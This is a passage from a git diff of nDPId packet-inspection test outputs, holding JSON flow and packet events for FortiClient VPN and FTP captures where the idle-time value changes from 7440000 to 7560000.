Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} +01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
+00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
+00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
+00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":298759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1621067222261} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 diff --git a/test/results/ftp-start-tls.pcap.out b/test/results/ftp-start-tls.pcap.out index 9f86287b9..d31c3014b 100644 --- a/test/results/ftp-start-tls.pcap.out +++ b/test/results/ftp-start-tls.pcap.out 
@@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp-start-tls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1383123629078} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} -00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} +00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":51,"total-skipped-flows":0,"total-l4-data-len":4690,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1383123629412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 51/51 diff --git a/test/results/ftp.pcap.out b/test/results/ftp.pcap.out index 564e81a63..1a0a7c92d 100644 --- a/test/results/ftp.pcap.out +++ b/test/results/ftp.pcap.out 
